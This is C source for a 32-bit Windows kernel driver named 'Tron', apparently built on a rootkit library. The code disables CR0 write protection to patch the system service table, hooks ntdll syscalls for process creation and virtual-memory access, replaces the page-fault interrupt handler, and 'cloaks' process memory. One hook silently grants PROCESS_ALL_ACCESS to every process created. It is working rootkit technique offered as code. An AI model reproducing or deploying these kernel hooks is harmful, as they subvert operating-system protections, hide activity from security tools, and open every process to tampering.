NTSTATUS NTAPI NewZwCreateProcessEx (OUT PHANDLE ProcessHandle,IN ACCESS_MASK DesiredAccess,IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,IN HANDLE ParentProcessHandle,IN BOOLEAN InheritObjectTable,IN HANDLE SectionHandle,IN HANDLE DebugPort,IN HANDLE ExceptionPort,IN HANDLE Unknown)
{
    LR_DEBUG(("DBG: ZwCreateProcessEx - IRQL is %d\n", KeGetCurrentIrql()));

    // TODO: Could make this a bit more targeted.. But meh.
    return sa.ZwCreateProcessEx(ProcessHandle, 
            DesiredAccess|PROCESS_ALL_ACCESS, // DOORS OPEN BOYS, COME ON IN!!1
            ObjectAttributes,
            ParentProcessHandle,InheritObjectTable, 
            SectionHandle,DebugPort, ExceptionPort,Unknown);

}

NTSTATUS UnHookServiceAPI()
{
    HANDLE ntdll;
    if(!(ntdll = KLoadLibrary(L"\\??\\c:\\Windows\\System32\\ntdll.dll"))) {
		LR_WARN(("WRN: Can't open ntdll!\n"));
	}

    //dissable interrupt while we change the pointers and make tabe writable
    _asm {
        CLI 
        MOV    EAX, CR0
        AND    EAX, NOT 10000H
        MOV    CR0, EAX
    }

    (ZWALLOCATEVIRTUALMEMORY)(SYSTEM_SERVICE(ZwAllocateVirtualMemory)) = sa.ZwAllocateVirtualMemory;
    (ZWTERMINATEPROCESS)(SYSTEM_SERVICE(ZwTerminateProcess)) = sa.ZwTerminateProcess;

    //enable interrupts with the new pointers inplace
    _asm {
        MOV    EAX, CR0
        OR    EAX, 10000H
        MOV    CR0, EAX
        STI
    }

    HookSyscall(ntdll, "ZwCreateProcessEx", (DWORD)sa.ZwCreateProcessEx);
    HookSyscall(ntdll, "ZwReadVirtualMemory", (DWORD)sa.ZwReadVirtualMemory);
    HookSyscall(ntdll, "ZwWriteVirtualMemory", (DWORD)sa.ZwWriteVirtualMemory);
    HookSyscall(ntdll, "ZwQueryVirtualMemory", (DWORD)sa.ZwQueryVirtualMemory);
    HookSyscall(ntdll, "ZwFreeVirtualMemory", (DWORD)sa.ZwFreeVirtualMemory);

    KFreeLibrary(ntdll);

    HANDLER_TO_VEC(pfault_handler, (DWORD)oldHandler);
    SetINTVector(&idt, 0x0e, &pfault_handler);

    if(SwapContextAddr) {
        UndoHotPatch(SwapContextAddr, (DWORD)PatchBuf);
    }

    DbgPrint("Restored pfault handler: %x\n", VEC_TO_HANDLER(pfault_handler));

    return STATUS_SUCCESS;
}


NTSTATUS HookServiceAPI()
{
    HANDLE ntdll;
    LibRootkit_Init();
   	
    if(!(ntdll = KLoadLibrary(L"\\??\\c:\\Windows\\System32\\ntdll.dll"))) {
        LR_WARN(("WRN: Can't open ntdll!\n"));
    }
    LR_DEBUG(("DBG: Ntdll @ %x\n", ntdll));
 
    __asm {
        CLI 
        MOV    EAX, CR0
        AND EAX, NOT 10000H
        MOV    CR0, EAX
    }

    (ZWALLOCATEVIRTUALMEMORY)(SYSTEM_SERVICE(ZwAllocateVirtualMemory)) = NewZwAllocateVirtualMemory;
    (ZWTERMINATEPROCESS)(SYSTEM_SERVICE(ZwTerminateProcess)) = NewZwTerminateProcess;

    //enable interrupts with the new pointers inplace
    __asm {
        MOV    EAX, CR0
        OR    EAX, 10000H
        MOV    CR0, EAX
        STI
    }

    // Recorded already by librootkit
    HookSyscall(ntdll, "ZwCreateProcessEx", (DWORD)NewZwCreateProcessEx);
    HookSyscall(ntdll, "ZwReadVirtualMemory", (DWORD)NewZwReadVirtualMemory);
    HookSyscall(ntdll, "ZwWriteVirtualMemory", (DWORD)NewZwWriteVirtualMemory);
    HookSyscall(ntdll, "ZwQueryVirtualMemory", (DWORD)NewZwQueryVirtualMemory);
    HookSyscall(ntdll, "ZwFreeVirtualMemory", (DWORD)NewZwFreeVirtualMemory);

    KFreeLibrary(ntdll);
   
    LoadIDT(&idt);
    GetINTVector(&idt, 0x0e, &pfault_handler);
    oldHandler = VEC_TO_HANDLER(pfault_handler);
    HANDLER_TO_VEC(pfault_handler, (DWORD)NewInt0EHandler);
    SetINTVector(&idt, 0x0e, &pfault_handler);

    LR_DEBUG(("DBG: Set pfault handler: %x\n", VEC_TO_HANDLER(pfault_handler)));

    return STATUS_SUCCESS;
}

VOID DriverExit(IN PDRIVER_OBJECT  DriverObject)
{
    LARGE_INTEGER pDelay;
    int i;
    LR_DEBUG(("DBG: DriverExit IRQL is %d\n", KeGetCurrentIrql()));

    for(i = 0; i < MAX_PIDS-1; i++) {
        if(pids[i]) {
            NTSTATUS stat;
            KAPC_STATE apc;
            PEPROCESS peproc;
            
            LR_NOTE(("NOT: You left outstanding cloaks for process %x\n", pids[i]));
            stat = PsLookupProcessByProcessId(pids[i], &peproc);
            
            // XXX: Check for failure.. If so, clear out data structures

            // have to attach first b/c no PEB in this context 
            KeStackAttachProcess(peproc, &apc);
            RemoveCloak(pids[i], 0, 0xfffe0000); 
            KeUnstackDetachProcess(&apc);
            pids[i] = 0;
        }
    }

    UnHookServiceAPI();
    LR_NOTE(("NOT: Tron has been uploaded to reality.\n"));

    // delay for hooks to catch up..
    pDelay.QuadPart = -5000000;
    KeDelayExecutionThread(KernelMode,TRUE,&pDelay);
}

NTSTATUS DriverEntry( IN PDRIVER_OBJECT theDriverObject, IN PUNICODE_STRING theRegistryPath )
{
    NTSTATUS status = STATUS_SUCCESS;

    if (sizeof(PVOID) != 4) {
        LR_NOTE(("NOT: Tron does not support 64bit arch yet..\n"));
        return STATUS_NOT_SUPPORTED;
    }

    LR_NOTE(("NOT: I'm Tron. I fight for the User.\n"));
    theDriverObject->DriverUnload  = DriverExit; 

    HookServiceAPI();

    return status;
}
